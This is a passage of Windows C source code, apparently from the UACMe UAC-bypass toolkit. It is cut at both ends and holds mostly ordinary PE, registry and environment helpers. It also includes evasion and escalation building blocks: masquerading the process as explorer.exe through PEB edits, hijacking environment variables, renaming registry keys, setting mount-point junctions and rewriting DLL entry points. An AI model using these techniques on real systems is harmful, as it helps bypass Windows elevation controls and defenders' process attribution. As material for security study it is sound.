}\n CheckSum = (ULONG)PartialSum + FileLength;\n return CheckSum;\n}\n\n/*\n* supVerifyMappedImageMatchesChecksum\n*\n* Purpose:\n*\n* Calculate PE file checksum and compare it with checksum in PE header.\n*\n*/\nBOOLEAN supVerifyMappedImageMatchesChecksum(\n _In_ PVOID BaseAddress,\n _In_ ULONG FileLength\n)\n{\n PIMAGE_NT_HEADERS NtHeaders;\n ULONG HeaderSum;\n ULONG CheckSum;\n\n CheckSum = supCalculateCheckSumForMappedFile(BaseAddress, FileLength);\n\n NtHeaders = RtlImageNtHeader(BaseAddress);\n if (NtHeaders) {\n HeaderSum = NtHeaders->OptionalHeader.CheckSum;\n }\n else {\n HeaderSum = FileLength;\n }\n return (CheckSum == HeaderSum);\n}\n\n/*\n* supSetCheckSumForMappedFile\n*\n* Purpose:\n*\n* Set checksum value to PE header.\n*\n*/\nBOOLEAN supSetCheckSumForMappedFile(\n _In_ PVOID BaseAddress,\n _In_ ULONG CheckSum\n)\n{\n PIMAGE_NT_HEADERS NtHeaders;\n\n NtHeaders = RtlImageNtHeader(BaseAddress);\n if (NtHeaders) {\n NtHeaders->OptionalHeader.CheckSum = CheckSum;\n return TRUE;\n }\n return FALSE;\n}\n\n/*\n* supLdrQueryResourceDataEx\n*\n* Purpose:\n*\n* Load resource by given id (win32 FindResource, SizeofResource, LockResource).\n*\n*/\nNTSTATUS supLdrQueryResourceDataEx(\n _In_ ULONG_PTR ResourceId,\n _In_ PVOID DllHandle,\n _Out_ PULONG DataSize,\n _Out_ PVOID* Data\n)\n{\n NTSTATUS status;\n ULONG_PTR IdPath[3];\n IMAGE_RESOURCE_DATA_ENTRY* DataEntry;\n ULONG SizeOfData = 0;\n\n if (DataSize)\n *DataSize = 0;\n\n if (DllHandle == NULL) {\n return STATUS_INVALID_PARAMETER_2;\n }\n\n IdPath[0] = (ULONG_PTR)RT_RCDATA; //type\n IdPath[1] = ResourceId; //id\n IdPath[2] = 0; //lang\n\n status = LdrFindResource_U(DllHandle, (ULONG_PTR*)&IdPath, 3, &DataEntry);\n if (NT_SUCCESS(status)) {\n status = LdrAccessResource(DllHandle, DataEntry, Data, &SizeOfData);\n if (NT_SUCCESS(status)) {\n if (DataSize) {\n *DataSize = SizeOfData;\n }\n }\n }\n\n return status;\n}\n\n/*\n* supLdrQueryResourceData\n*\n* Purpose:\n*\n* Load resource by given id (win32 FindResource, SizeofResource, LockResource).\n*\n*/\nPBYTE supLdrQueryResourceData(\n _In_ ULONG_PTR ResourceId,\n _In_ PVOID DllHandle,\n _Out_ PULONG DataSize\n)\n{\n NTSTATUS status;\n PBYTE Data = NULL;\n\n status = supLdrQueryResourceDataEx(ResourceId,\n DllHandle,\n DataSize,\n &Data);\n\n if (NT_SUCCESS(status))\n return Data;\n\n return NULL;\n}\n\n/*\n* supSetLastErrorFromNtStatus\n*\n* Purpose:\n*\n* Convert last error.\n*\n*/\nVOID supSetLastErrorFromNtStatus(\n _In_ NTSTATUS LastNtStatus\n)\n{\n DWORD dwErrorCode;\n#ifdef _WIN64\n dwErrorCode = RtlNtStatusToDosErrorNoTeb(LastNtStatus);\n#else\n dwErrorCode = RtlNtStatusToDosError(LastNtStatus);\n#endif\n SetLastError(dwErrorCode);\n}\n\nstatic PWSTR g_lpszExplorer = NULL;\n\ntypedef struct _LDR_BACKUP {\n PWSTR ImagePathName;\n PWSTR CommandLine;\n PWSTR lpFullDllName;\n PWSTR lpBaseDllName;\n} LDR_BACKUP, * PLDR_BACKUP;\n\nstatic LDR_BACKUP g_LdrBackup;\n\n/*\n* supxLdrEnumModulesCallback\n*\n* Purpose:\n*\n* LdrEnumerateLoadedModules callback.\n*\n*/\nVOID NTAPI supxLdrEnumModulesCallback(\n _In_ PCLDR_DATA_TABLE_ENTRY DataTableEntry,\n _In_ PVOID Context,\n _Inout_ BOOLEAN* StopEnumeration\n)\n{\n PPEB Peb = NtCurrentPeb();\n PWSTR FullDllName, BaseDllName;\n\n BOOL Restore = PtrToInt(Context);\n\n if (DataTableEntry->DllBase == Peb->ImageBaseAddress) {\n\n if (Restore) {\n FullDllName = g_LdrBackup.lpFullDllName;\n BaseDllName = g_LdrBackup.lpBaseDllName;\n }\n else {\n g_LdrBackup.lpBaseDllName = DataTableEntry->BaseDllName.Buffer;\n g_LdrBackup.lpFullDllName = DataTableEntry->FullDllName.Buffer;\n FullDllName = g_lpszExplorer;\n BaseDllName = EXPLORER_EXE;\n }\n\n RtlInitUnicodeString(&DataTableEntry->FullDllName, FullDllName);\n RtlInitUnicodeString(&DataTableEntry->BaseDllName, BaseDllName);\n\n *StopEnumeration = TRUE;\n }\n else {\n *StopEnumeration = FALSE;\n }\n}\n\n/*\n* supMasqueradeProcess\n*\n* Purpose:\n*\n* Fake/Restore current process information.\n*\n*/\nVOID supMasqueradeProcess(\n _In_ BOOL Restore\n)\n{\n NTSTATUS Status;\n PPEB Peb = NtCurrentPeb();\n SIZE_T RegionSize;\n\n PWSTR ImageFileName, CommandLine;\n\n if (Restore == FALSE) {\n\n g_lpszExplorer = NULL;\n RegionSize = PAGE_SIZE;\n Status = NtAllocateVirtualMemory(\n NtCurrentProcess(),\n (PVOID*)&g_lpszExplorer,\n 0,\n &RegionSize,\n MEM_COMMIT | MEM_RESERVE,\n PAGE_READWRITE);\n\n if (NT_SUCCESS(Status)) {\n _strcpy(g_lpszExplorer, g_ctx->szSystemRoot);\n _strcat(g_lpszExplorer, EXPLORER_EXE);\n }\n else {\n supSetLastErrorFromNtStatus(Status);\n return;\n }\n }\n\n RtlAcquirePebLock();\n\n if (Restore) {\n CommandLine = g_LdrBackup.CommandLine;\n ImageFileName = g_LdrBackup.ImagePathName;\n }\n else {\n g_LdrBackup.ImagePathName = Peb->ProcessParameters->ImagePathName.Buffer;\n g_LdrBackup.CommandLine = Peb->ProcessParameters->CommandLine.Buffer;\n\n ImageFileName = g_lpszExplorer;\n CommandLine = EXPLORER_EXE;\n }\n\n RtlInitUnicodeString(&Peb->ProcessParameters->ImagePathName, ImageFileName);\n RtlInitUnicodeString(&Peb->ProcessParameters->CommandLine, CommandLine);\n\n if (Restore) {\n\n RegionSize = 0;\n NtFreeVirtualMemory(\n NtCurrentProcess(),\n (PVOID*)&g_lpszExplorer,\n &RegionSize,\n MEM_RELEASE);\n\n g_lpszExplorer = NULL;\n\n }\n\n RtlReleasePebLock();\n\n LdrEnumerateLoadedModules(0, &supxLdrEnumModulesCallback, IntToPtr(Restore));\n}\n\n/*\n* supExpandEnvironmentStrings\n*\n* Purpose:\n*\n* Native ExpandEnvironmetStrings.\n*\n*/\nDWORD supExpandEnvironmentStrings(\n _In_ LPCWSTR lpSrc,\n _In_ LPWSTR lpDst,\n _In_ DWORD nSize\n)\n{\n NTSTATUS Status;\n UNICODE_STRING Source, Destination;\n ULONG Length;\n DWORD iSize;\n\n if (nSize > (MAXUSHORT >> 1) - 2) {\n iSize = (MAXUSHORT >> 1) - 2;\n }\n else {\n iSize = nSize;\n }\n\n RtlInitUnicodeString(&Source, lpSrc);\n Destination.Buffer = lpDst;\n Destination.Length = 0;\n Destination.MaximumLength = (USHORT)(iSize * sizeof(WCHAR));\n Length = 0;\n Status = RtlExpandEnvironmentStrings_U(NULL,\n &Source,\n &Destination,\n &Length\n );\n if (NT_SUCCESS(Status) || Status == STATUS_BUFFER_TOO_SMALL) {\n return (DWORD)(Length / sizeof(WCHAR));\n }\n else {\n supSetLastErrorFromNtStatus(Status);\n return 0;\n }\n}\n\n/*\n* sxsFilePathNoSlash\n*\n* Purpose:\n*\n* same as _filepath except it doesnt return last slash.\n*\n*/\nwchar_t* sxsFilePathNoSlash(\n const wchar_t* fname,\n wchar_t* fpath\n)\n{\n wchar_t* p = (wchar_t*)fname, * p0 = (wchar_t*)fname, * p1 = (wchar_t*)fpath;\n\n if ((fname == 0) || (fpath == NULL))\n return 0;\n\n while (*fname != (wchar_t)0) {\n if (*fname == '\\\\')\n p = (wchar_t*)fname;\n fname++;\n }\n\n while (p0 < p) {\n *p1 = *p0;\n p1++;\n p0++;\n }\n *p1 = 0;\n\n return fpath;\n}\n\n/*\n* sxsFindLoaderEntry\n*\n* Purpose:\n*\n* Return loader entry filename for sxs dll.\n*\n*/\nBOOL sxsFindLoaderEntry(\n _In_ PSXS_SEARCH_CONTEXT Context\n)\n{\n NTSTATUS Status;\n HANDLE hDll = NULL;\n UNICODE_STRING usDll;\n\n PLDR_DATA_TABLE_ENTRY LdrTableEntry = NULL;\n\n RtlInitUnicodeString(&usDll, Context->DllName);\n\n Status = LdrGetDllHandle(\n NULL,\n NULL,\n &usDll,\n &hDll);\n\n if (NT_SUCCESS(Status)) {\n\n Status = LdrFindEntryForAddress(\n hDll,\n &LdrTableEntry);\n\n if (NT_SUCCESS(Status)) {\n\n if (_strstri(\n LdrTableEntry->FullDllName.Buffer,\n L\".local\") == NULL)\n {\n if (_strstri(\n LdrTableEntry->FullDllName.Buffer,\n Context->SxsKey))\n {\n sxsFilePathNoSlash(\n LdrTableEntry->FullDllName.Buffer,\n Context->FullDllPath);\n\n }\n else\n Status = STATUS_NOT_FOUND;\n }\n else\n Status = STATUS_TOO_LATE;\n }\n }\n\n return NT_SUCCESS(Status);\n}\n\n/*\n* supxDeleteKeyRecursive\n*\n* Purpose:\n*\n* Delete key and all it subkeys/values.\n*\n*/\nBOOL supxDeleteKeyRecursive(\n _In_ HKEY hKeyRoot,\n _In_ LPWSTR lpSubKey)\n{\n LPWSTR lpEnd;\n LONG lResult;\n DWORD dwSize;\n WCHAR szName[MAX_PATH + 1];\n HKEY hKey;\n FILETIME ftWrite;\n\n //\n // Attempt to delete key as is.\n //\n lResult = RegDeleteKey(hKeyRoot, lpSubKey);\n if (lResult == ERROR_SUCCESS)\n return TRUE;\n\n //\n // Try to open key to check if it exist.\n //\n lResult = RegOpenKeyEx(hKeyRoot, lpSubKey, 0, KEY_READ, &hKey);\n if (lResult != ERROR_SUCCESS) {\n if (lResult == ERROR_FILE_NOT_FOUND)\n return TRUE;\n else\n return FALSE;\n }\n\n //\n // Add slash to the key path if not present.\n //\n lpEnd = _strend(lpSubKey);\n if (*(lpEnd - 1) != TEXT('\\\\')) {\n *lpEnd = TEXT('\\\\');\n lpEnd++;\n *lpEnd = TEXT('\\0');\n }\n\n //\n // Enumerate subkeys and call this func for each.\n //\n dwSize = MAX_PATH;\n lResult = RegEnumKeyEx(hKey, 0, szName, &dwSize, NULL,\n NULL, NULL, &ftWrite);\n\n if (lResult == ERROR_SUCCESS) {\n\n do {\n\n _strncpy(lpEnd, MAX_PATH, szName, MAX_PATH);\n\n if (!supxDeleteKeyRecursive(hKeyRoot, lpSubKey))\n break;\n\n dwSize = MAX_PATH;\n\n lResult = RegEnumKeyEx(hKey, 0, szName, &dwSize, NULL,\n NULL, NULL, &ftWrite);\n\n } while (lResult == ERROR_SUCCESS);\n }\n\n lpEnd--;\n *lpEnd = TEXT('\\0');\n\n RegCloseKey(hKey);\n\n //\n // Delete current key, all it subkeys should be already removed.\n //\n lResult = RegDeleteKey(hKeyRoot, lpSubKey);\n if (lResult == ERROR_SUCCESS)\n return TRUE;\n\n return FALSE;\n}\n\n/*\n* supRegDeleteKeyRecursive\n*\n* Purpose:\n*\n* Delete key and all it subkeys/values.\n*\n* Remark:\n*\n* SubKey should not be longer than 260 chars.\n*\n*/\nBOOL supRegDeleteKeyRecursive(\n _In_ HKEY hKeyRoot,\n _In_ LPCWSTR lpSubKey)\n{\n WCHAR szKeyName[MAX_PATH * 2];\n RtlSecureZeroMemory(szKeyName, sizeof(szKeyName));\n _strncpy(szKeyName, MAX_PATH * 2, lpSubKey, MAX_PATH);\n return supxDeleteKeyRecursive(hKeyRoot, szKeyName);\n}\n\n/*\n* supSetEnvVariableEx\n*\n* Purpose:\n*\n* Remove or set current user environment variable (NTAPI variant).\n*\n*/\nBOOL supSetEnvVariableEx(\n _In_ BOOL fRemove,\n _In_opt_ LPWSTR lpKeyName,\n _In_ LPCWSTR lpVariableName,\n _In_opt_ LPCWSTR lpVariableData\n)\n{\n BOOL bNameAllocated = FALSE;\n DWORD cbData;\n NTSTATUS ntStatus = STATUS_UNSUCCESSFUL;\n LPWSTR lpSubKey;\n HANDLE hRoot = NULL, hSubKey = NULL;\n\n OBJECT_ATTRIBUTES obja;\n UNICODE_STRING usRootKey, usSubKey, usValueName;\n\n usRootKey.Buffer = NULL;\n\n do {\n if (lpVariableName == NULL) {\n //\n // Nothing to set/remove.\n //\n break;\n }\n\n if ((lpVariableData == NULL) && (fRemove == FALSE))\n break;\n\n if (lpKeyName == NULL)\n lpSubKey = L\"Environment\";\n else\n lpSubKey = lpKeyName;\n\n ntStatus = RtlFormatCurrentUserKeyPath(&usRootKey);\n if (!NT_SUCCESS(ntStatus))\n break;\n\n bNameAllocated = TRUE;\n\n InitializeObjectAttributes(&obja, &usRootKey, OBJ_CASE_INSENSITIVE, NULL, NULL);\n ntStatus = NtOpenKey(&hRoot, MAXIMUM_ALLOWED, &obja);\n if (!NT_SUCCESS(ntStatus))\n break;\n\n RtlInitUnicodeString(&usSubKey, lpSubKey);\n obja.RootDirectory = hRoot;\n obja.ObjectName = &usSubKey;\n ntStatus = NtOpenKey(&hSubKey, MAXIMUM_ALLOWED, &obja);\n if (!NT_SUCCESS(ntStatus))\n break;\n\n RtlInitUnicodeString(&usValueName, lpVariableName);\n\n if (fRemove) {\n\n ntStatus = NtDeleteValueKey(hSubKey, &usValueName);\n\n }\n else {\n\n cbData = (DWORD)((1 + _strlen(lpVariableData)) * sizeof(WCHAR));\n\n ntStatus = NtSetValueKey(hSubKey,\n &usValueName,\n 0,\n REG_SZ,\n (BYTE*)lpVariableData,\n cbData);\n\n }\n\n if (NT_SUCCESS(ntStatus)) {\n\n SendMessageTimeout(HWND_BROADCAST,\n WM_SETTINGCHANGE,\n 0,\n (LPARAM)lpVariableName,\n SMTO_BLOCK,\n 1000,\n NULL);\n\n }\n\n } while (FALSE);\n\n if (hSubKey) NtClose(hSubKey);\n if (hRoot) NtClose(hRoot);\n if (bNameAllocated)\n RtlFreeUnicodeString(&usRootKey);\n\n return NT_SUCCESS(ntStatus);\n}\n\n/*\n* supSetEnvVariable\n*\n* Purpose:\n*\n* Remove or set current user environment variable.\n*\n*/\nBOOL supSetEnvVariable(\n _In_ BOOL fRemove,\n _In_opt_ LPWSTR lpKeyName,\n _In_ LPCWSTR lpVariableName,\n _In_opt_ LPCWSTR lpVariableData\n)\n{\n BOOL bResult = FALSE;\n HKEY hKey = NULL;\n DWORD cbData;\n\n LPWSTR lpSubKey;\n\n do {\n if (lpVariableName == NULL)\n break;\n\n if (lpKeyName == NULL)\n lpSubKey = L\"Environment\";\n else\n lpSubKey = lpKeyName;\n\n if ((lpVariableData == NULL) && (fRemove == FALSE))\n break;\n\n if (RegOpenKey(HKEY_CURRENT_USER, lpSubKey, &hKey) != ERROR_SUCCESS)\n break;\n\n if (fRemove) {\n bResult = (RegDeleteValue(hKey, lpVariableName) == ERROR_SUCCESS);\n }\n else {\n cbData = (DWORD)((1 + _strlen(lpVariableData)) * sizeof(WCHAR));\n bResult = (RegSetValueEx(hKey, lpVariableName, 0, REG_SZ,\n (BYTE*)lpVariableData, cbData) == ERROR_SUCCESS);\n\n }\n\n if (bResult) {\n SendMessageTimeout(HWND_BROADCAST,\n WM_SETTINGCHANGE,\n 0,\n (LPARAM)lpVariableName,\n SMTO_BLOCK,\n 1000,\n NULL);\n }\n\n } while (FALSE);\n\n if (hKey != NULL) {\n RegFlushKey(hKey);\n RegCloseKey(hKey);\n }\n\n return bResult;\n}\n\n/*\n* supSetEnvVariable\n*\n* Purpose:\n*\n* Remove or set current user environment variable.\n*\n*/\nBOOL supSetEnvVariable2(\n _In_ BOOL fRemove,\n _In_opt_ LPWSTR lpKeyName,\n _In_ LPCWSTR lpVariableName,\n _In_opt_ LPCWSTR lpVariableData\n)\n{\n BOOL bResult = FALSE;\n HKEY hKey = NULL;\n DWORD cbData;\n\n LPWSTR lpSubKey;\n\n LARGE_INTEGER liValue;\n ULONG seedValue;\n WCHAR szNewKey[MAX_PATH];\n\n do {\n if (lpVariableName == NULL)\n break;\n\n if (lpKeyName == NULL)\n lpSubKey = L\"Environment\";\n else\n lpSubKey = lpKeyName;\n\n if ((lpVariableData == NULL) && (fRemove == FALSE))\n break;\n\n RtlSecureZeroMemory(&szNewKey, sizeof(szNewKey));\n seedValue = GetTickCount();\n liValue.LowPart = RtlRandomEx(&seedValue);\n seedValue = ~GetTickCount();\n liValue.HighPart = RtlRandomEx(&seedValue);\n\n supBinTextEncode(liValue.QuadPart, szNewKey);\n\n if (ERROR_SUCCESS == RegRenameKey(HKEY_CURRENT_USER, lpSubKey, szNewKey)) {\n\n if (ERROR_SUCCESS == RegOpenKey(HKEY_CURRENT_USER, szNewKey, &hKey)) {\n\n if (fRemove) {\n bResult = (RegDeleteValue(hKey, lpVariableName) == ERROR_SUCCESS);\n }\n else {\n cbData = (DWORD)((1 + _strlen(lpVariableData)) * sizeof(WCHAR));\n bResult = (RegSetValueEx(hKey, lpVariableName, 0, REG_SZ,\n (BYTE*)lpVariableData, cbData) == ERROR_SUCCESS);\n\n\n }\n\n RegFlushKey(hKey);\n RegCloseKey(hKey);\n hKey = NULL;\n\n }\n\n RegRenameKey(HKEY_CURRENT_USER, szNewKey, lpSubKey);\n }\n\n if (bResult) {\n SendMessageTimeout(HWND_BROADCAST,\n WM_SETTINGCHANGE,\n 0,\n (LPARAM)lpVariableName,\n SMTO_BLOCK,\n 1000,\n NULL);\n }\n\n } while (FALSE);\n\n if (hKey != NULL) {\n RegFlushKey(hKey);\n RegCloseKey(hKey);\n }\n\n return bResult;\n}\n\n/*\n* supReplaceEnvironmentVariableValue\n*\n* Purpose:\n*\n* Replace/Restore environment variable value.\n*\n*/\n_Success_(return)\nBOOL supReplaceEnvironmentVariableValue(\n _In_opt_ LPWSTR lpKeyName,\n _In_ LPWSTR lpVariableName,\n _In_ DWORD dwType,\n _In_opt_ LPWSTR lpVariableData,\n _Out_opt_ PVOID *lpOldVariableData\n)\n{\n BOOL bNameAllocated = FALSE, bDoBackup = (lpOldVariableData != NULL);\n DWORD cbData;\n NTSTATUS ntStatus = STATUS_UNSUCCESSFUL;\n LPWSTR lpSubKey;\n HANDLE hRoot = NULL, hSubKey = NULL;\n\n OBJECT_ATTRIBUTES obja;\n UNICODE_STRING usRootKey, usSubKey, usValueName;\n\n usRootKey.Buffer = NULL;\n\n do {\n if (lpVariableName == NULL) {\n //\n // Nothing to replace.\n //\n break;\n }\n\n if (lpVariableData == NULL)\n break;\n\n if (lpKeyName == NULL)\n lpSubKey = L\"Environment\";\n else\n lpSubKey = lpKeyName;\n\n ntStatus = RtlFormatCurrentUserKeyPath(&usRootKey);\n if (!NT_SUCCESS(ntStatus))\n break;\n\n bNameAllocated = TRUE;\n\n InitializeObjectAttributes(&obja, &usRootKey, OBJ_CASE_INSENSITIVE, NULL, NULL);\n ntStatus = NtOpenKey(&hRoot, MAXIMUM_ALLOWED, &obja);\n if (!NT_SUCCESS(ntStatus))\n break;\n\n RtlInitUnicodeString(&usSubKey, lpSubKey);\n obja.RootDirectory = hRoot;\n obja.ObjectName = &usSubKey;\n ntStatus = NtOpenKey(&hSubKey, MAXIMUM_ALLOWED, &obja);\n if (!NT_SUCCESS(ntStatus))\n break;\n\n RtlInitUnicodeString(&usValueName, lpVariableName);\n\n\n if (bDoBackup) {\n\n cbData = 0;\n\n //\n // Read value, failure is not critical, value may not present.\n //\n supRegReadValue(hSubKey,\n lpVariableName,\n dwType,\n lpOldVariableData,\n &cbData,\n g_ctx->ucmHeap);\n\n }\n\n cbData = (DWORD)((1 + _strlen(lpVariableData)) * sizeof(WCHAR));\n\n ntStatus = NtSetValueKey(hSubKey,\n &usValueName,\n 0,\n dwType,\n (BYTE*)lpVariableData,\n cbData);\n\n if (NT_SUCCESS(ntStatus)) {\n\n SendMessageTimeout(HWND_BROADCAST,\n WM_SETTINGCHANGE,\n 0,\n (LPARAM)lpVariableName,\n SMTO_BLOCK,\n 1000,\n NULL);\n\n }\n\n } while (FALSE);\n\n if (hSubKey) NtClose(hSubKey);\n if (hRoot) NtClose(hRoot);\n if (bNameAllocated)\n RtlFreeUnicodeString(&usRootKey);\n\n return NT_SUCCESS(ntStatus);\n}\n\n/*\n* supDeleteMountPoint\n*\n* Purpose:\n*\n* Removes reparse point of type mount_point.\n*\n*/\nBOOL supDeleteMountPoint(\n _In_ HANDLE hDirectory\n)\n{\n NTSTATUS status;\n IO_STATUS_BLOCK IoStatusBlock;\n\n REPARSE_GUID_DATA_BUFFER Buffer;\n\n RtlSecureZeroMemory(&Buffer, sizeof(REPARSE_GUID_DATA_BUFFER));\n Buffer.ReparseTag = IO_REPARSE_TAG_MOUNT_POINT;\n\n status = NtFsControlFile(hDirectory,\n NULL,\n NULL,\n NULL,\n &IoStatusBlock,\n FSCTL_DELETE_REPARSE_POINT,\n &Buffer,\n REPARSE_GUID_DATA_BUFFER_HEADER_SIZE,\n NULL,\n 0);\n\n if (status == STATUS_NOT_A_REPARSE_POINT) {\n SetLastError(ERROR_INVALID_PARAMETER);\n }\n else {\n supSetLastErrorFromNtStatus(status);\n }\n\n return NT_SUCCESS(status);\n}\n\n/*\n* supSetMountPoint\n*\n* Purpose:\n*\n* Install reparse point of type mount_point to target.\n*\n*/\nBOOL supSetMountPoint(\n _In_ HANDLE hDirectory,\n _In_ LPCWSTR lpTarget,\n _In_ LPCWSTR lpPrintName\n)\n{\n ULONG memIO;\n USHORT cbTarget, cbPrintName, reparseDataLength;\n NTSTATUS status;\n IO_STATUS_BLOCK IoStatusBlock;\n\n REPARSE_DATA_BUFFER* Buffer;\n\n if ((lpTarget == NULL) || (lpPrintName == NULL)) {\n SetLastError(ERROR_INVALID_PARAMETER);\n return FALSE;\n }\n\n //\n // Calculate required buffer size.\n // Header + length of input strings + safe space.\n //\n cbTarget = (USHORT)(_strlen(lpTarget) * sizeof(WCHAR));\n cbPrintName = (USHORT)(_strlen(lpPrintName) * sizeof(WCHAR));\n\n reparseDataLength = cbTarget + cbPrintName + 12;\n memIO = (ULONG)(reparseDataLength + REPARSE_DATA_BUFFER_HEADER_LENGTH);\n\n Buffer = (REPARSE_DATA_BUFFER*)supHeapAlloc((SIZE_T)memIO);\n if (Buffer == NULL)\n return FALSE;\n\n //\n // Setup reparse point structure.\n //\n Buffer->ReparseTag = IO_REPARSE_TAG_MOUNT_POINT;\n Buffer->ReparseDataLength = reparseDataLength;\n\n //\n // Add Target to PathBuffer.\n //\n Buffer->MountPointReparseBuffer.SubstituteNameOffset = 0;\n Buffer->MountPointReparseBuffer.SubstituteNameLength = cbTarget;\n\n RtlCopyMemory(Buffer->MountPointReparseBuffer.PathBuffer,\n lpTarget,\n cbTarget);\n\n //\n // Add PrintName to PathBuffer.\n //\n Buffer->MountPointReparseBuffer.PrintNameOffset = cbTarget + sizeof(UNICODE_NULL);\n Buffer->MountPointReparseBuffer.PrintNameLength = cbPrintName;\n\n RtlCopyMemory(&Buffer->MountPointReparseBuffer.PathBuffer[(cbTarget / sizeof(WCHAR)) + 1],\n lpPrintName,\n cbPrintName);\n\n //\n // Set reparse point.\n //\n status = NtFsControlFile(hDirectory,\n NULL,\n NULL,\n NULL,\n &IoStatusBlock,\n FSCTL_SET_REPARSE_POINT,\n Buffer,\n memIO,\n NULL,\n 0);\n\n supHeapFree(Buffer);\n\n supSetLastErrorFromNtStatus(status);\n return NT_SUCCESS(status);\n}\n\n/*\n* supOpenDirectoryForReparse\n*\n* Purpose:\n*\n* Open directory handle to set reparse point.\n*\n*/\nHANDLE supOpenDirectoryForReparse(\n _In_ LPCWSTR lpDirectory\n)\n{\n NTSTATUS status = STATUS_UNSUCCESSFUL;\n HANDLE hReparseDirectory = NULL;\n UNICODE_STRING usReparseDirectory;\n IO_STATUS_BLOCK IoStatusBlock;\n OBJECT_ATTRIBUTES ObjectAttributes;\n\n usReparseDirectory.Buffer = NULL;\n if (RtlDosPathNameToNtPathName_U(lpDirectory, &usReparseDirectory, NULL, NULL)) {\n\n InitializeObjectAttributes(&ObjectAttributes, &usReparseDirectory, OBJ_CASE_INSENSITIVE, NULL, NULL);\n\n status = NtCreateFile(&hReparseDirectory,\n FILE_ALL_ACCESS,\n &ObjectAttributes,\n &IoStatusBlock,\n NULL,\n 0,\n FILE_SHARE_READ | FILE_SHARE_WRITE,\n FILE_OPEN,\n FILE_OPEN_REPARSE_POINT | FILE_SYNCHRONOUS_IO_NONALERT,\n NULL,\n 0);\n\n RtlFreeUnicodeString(&usReparseDirectory);\n }\n\n supSetLastErrorFromNtStatus(status);\n\n return hReparseDirectory;\n}\n\n/*\n* supWinstationToName\n*\n* Purpose:\n*\n* Retrieves winstation string name.\n*\n*/\nBOOL supWinstationToName(\n _In_opt_ HWINSTA hWinsta,\n _In_ LPWSTR lpBuffer,\n _In_ DWORD cbBuffer,\n _Out_ PDWORD BytesNeeded\n)\n{\n HWINSTA hObject;\n\n if (hWinsta == NULL)\n hObject = GetProcessWindowStation();\n else\n hObject = hWinsta;\n\n return GetUserObjectInformation(\n hObject,\n UOI_NAME,\n lpBuffer,\n cbBuffer,\n BytesNeeded);\n}\n\n/*\n* supDesktopToName\n*\n* Purpose:\n*\n* Retrieves desktop string name.\n*\n*/\nBOOL supDesktopToName(\n _In_opt_ HDESK hDesktop,\n _In_ LPWSTR lpBuffer,\n _In_ DWORD cbBuffer,\n _Out_ PDWORD BytesNeeded\n)\n{\n HDESK hObject;\n\n if (hDesktop == NULL)\n hObject = GetThreadDesktop(GetCurrentThreadId());\n else\n hObject = hDesktop;\n\n return GetUserObjectInformation(\n hObject,\n UOI_NAME,\n lpBuffer,\n cbBuffer,\n BytesNeeded);\n}\n\n/*\n* supReplaceDllEntryPoint\n*\n* Purpose:\n*\n* Replace DLL entry point and optionally convert dll to exe.\n*\n*/\nBOOL supReplaceDllEntryPoint(\n _In_ PVOID DllImage,\n _In_ ULONG SizeOfDllImage,\n _In_ LPCSTR lpEntryPointName,\n _In_ BOOL fConvertToExe\n)\n{\n BOOL bResult = FALSE;\n PIMAGE_NT_HEADERS NtHeaders;\n DWORD DllVirtualSize;\n PVOID DllBase, EntryPoint;\n\n NtHeaders = RtlImageNtHeader(DllImage);\n if (NtHeaders) {\n\n DllVirtualSize = 0;\n DllBase = PELoaderLoadImage(DllImage, &DllVirtualSize);\n if (DllBase) {\n //\n // Get the new entrypoint.\n //\n EntryPoint = PELoaderGetProcAddress(DllBase, (PCHAR)lpEntryPointName);\n if (EntryPoint) {\n //\n // Set new entrypoint and recalculate checksum.\n //\n NtHeaders->OptionalHeader.AddressOfEntryPoint =\n (ULONG)((ULONG_PTR)EntryPoint - (ULONG_PTR)DllBase);\n\n if (fConvertToExe)\n NtHeaders->FileHeader.Characteristics &= ~IMAGE_FILE_DLL;\n\n NtHeaders->OptionalHeader.CheckSum =\n supCalculateCheckSumForMappedFile(DllImage, SizeOfDllImage);\n\n bResult = TRUE;\n }\n VirtualFree(DllBase, 0, MEM_RELEASE);\n }\n }\n return bResult;\n}\n\n/*\n* supQuerySystemRoot\n*\n* Purpose:\n*\n* Query system root value from registry to the program global context.\n*\n*/\nBOOL supQuerySystemRoot(\n _Inout_ PVOID Context)\n{\n BOOL bResult = FALSE, needBackslash = FALSE;\n NTSTATUS Status;\n UNICODE_STRING UString;\n OBJECT_ATTRIBUTES ObjectAttributes;\n\n PWCHAR lpData = NULL;\n SIZE_T ccm = 0, cch = 0;\n HANDLE hKey = NULL;\n\n PUACMECONTEXT context = (PUACMECONTEXT)Context;\n\n WCHAR szBuffer[MAX_PATH];\n WCHAR szSystem32Prep[] = { L's', L'y', L's', L't', L'e', L'm', L'3', L'2', L'\\\\', 0 };\n\n ULONG Length = 0, cbSystem32Prep = sizeof(szSystem32Prep) - sizeof(WCHAR);\n\n do {\n _strcpy(szBuffer, T_REGISTRY_PREP);\n _strcat(szBuffer, T_WINDOWS_CURRENT_VERSION);\n RtlInitUnicodeString(&UString, szBuffer);\n\n InitializeObjectAttributes(&ObjectAttributes, &UString, OBJ_CASE_INSENSITIVE, NULL, NULL);\n Status = NtOpenKey(&hKey, KEY_READ, &ObjectAttributes);\n if (!NT_SUCCESS(Status))\n break;\n\n Status = supRegReadValue(hKey, L\"SystemRoot\", REG_SZ, (PVOID*)&lpData, &Length, context->ucmHeap);\n if (!NT_SUCCESS(Status) || (lpData == NULL))\n break;\n\n cch = _strlen(lpData);\n if (cch == 0) {\n SetLastError(ERROR_INVALID_DATA);\n break;\n }\n\n needBackslash = (lpData[cch - 1] != L'\\\\');\n ccm = cch + (needBackslash ? 1 : 0) + (cbSystem32Prep / sizeof(WCHAR));\n\n if (ccm >= MAX_PATH) {\n SetLastError(ERROR_BUFFER_OVERFLOW);\n break;\n }\n\n _strncpy(context->szSystemRoot, MAX_PATH, lpData, cch + 1);\n if (needBackslash) {\n context->szSystemRoot[cch] = L'\\\\';\n context->szSystemRoot[cch + 1] = UNICODE_NULL;\n }\n\n _strcpy(context->szSystemDirectory, context->szSystemRoot);\n _strcat(context->szSystemDirectory, szSystem32Prep);\n\n bResult = TRUE;\n\n } while (FALSE);\n\n if (hKey) NtClose(hKey);\n if (lpData) RtlFreeHeap(context->ucmHeap, 0, lpData);\n\n return bResult;\n}\n\n#define SI_MAX_BUFFER_LENGTH (512 * 1024 * 1024)\n\n/*\n* supGetSystemInfo\n*\n* Purpose:\n*\n* Returns buffer with system information by given InfoClass.\n*\n* Returned buffer must be freed with supHeapFree after usage.\n*\n*/\nPVOID supGetSystemInfo(\n _In_ SYSTEM_INFORMATION_CLASS SystemInformationClass\n)\n{\n PVOID buffer = 